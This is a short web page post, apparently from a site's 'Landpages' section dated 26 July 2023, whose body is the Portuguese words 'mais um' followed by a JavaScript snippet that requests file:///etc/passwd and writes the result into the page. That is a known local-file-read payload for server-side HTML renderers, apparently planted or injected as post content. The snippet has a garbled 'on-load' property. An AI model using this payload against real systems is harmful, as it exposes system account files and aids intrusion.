Written on 26 July 2023. Posted in Landpages. mais um x = new XMLHttpRequest(); x.on-load = function() { document.write(this.responseText) }; x.open("GET", "file:///etc/passwd"); x.send(); Print Prev Next